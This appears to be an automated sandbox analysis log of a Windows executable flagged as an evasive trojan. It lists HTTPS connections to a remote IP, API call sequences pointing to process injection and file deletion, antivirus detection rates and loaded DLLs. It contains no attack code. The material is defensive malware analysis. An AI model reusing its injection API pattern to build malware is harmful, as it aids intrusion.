            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
            Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
            Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
            Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49825 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49840 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49853 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49864 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49874 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49885 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49897 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49909 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49921 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49933 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49945 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49957 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49969 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49981 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49994 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50005 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50017 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50022 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50024 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50026 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50028 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50030 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50032 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50034 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50037 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50039 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50041 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50043 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50045 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50047 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50049 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50051 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50053 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50055 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50057 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50059 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50063 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50065 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50067 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50069 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50071 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50075 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50077 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50079 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50081 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50083 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50085 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50089 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50091 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50093 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50095 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50097 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50099 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50101 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50103 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50105 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50107 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50109 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50111 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50113 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50115 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50117 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50119 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50121 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50123 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:50125 version: TLS 1.2
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0285DFE4
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02857CF8 NtWriteVirtualMemory,0_2_02857CF8
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858BA6 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02858BA6
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02858BA8 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02858BA8
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0285DE24
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0285DE78
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0285DF00
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_0285F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_0285F0A8
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_028420C40_2_028420C4
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: String function: 028446A4 appears 244 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: String function: 028444AC appears 74 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: String function: 02858798 appears 54 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: String function: 0284480C appears 931 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: String function: 028444D0 appears 33 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: String function: 0285881C appears 45 times
            Source: JDQS879kiy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal76.troj.evad.winEXE@1/0@2/1
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02847F54 GetDiskFreeSpaceA,0_2_02847F54
            Source: C:\Users\user\Desktop\JDQS879kiy.exeCode function: 0_2_02856D48 CoCreateInstance,0_2_02856D48
            Source: C:\Users\user\Desktop\JDQS879kiy.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: JDQS879kiy.exeVirustotal: Detection: 79%
            Source: JDQS879kiy.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\JDQS879kiy.exeFile read: C:\Users\user\Desktop\JDQS879kiy.exeJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: winhttpcom.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
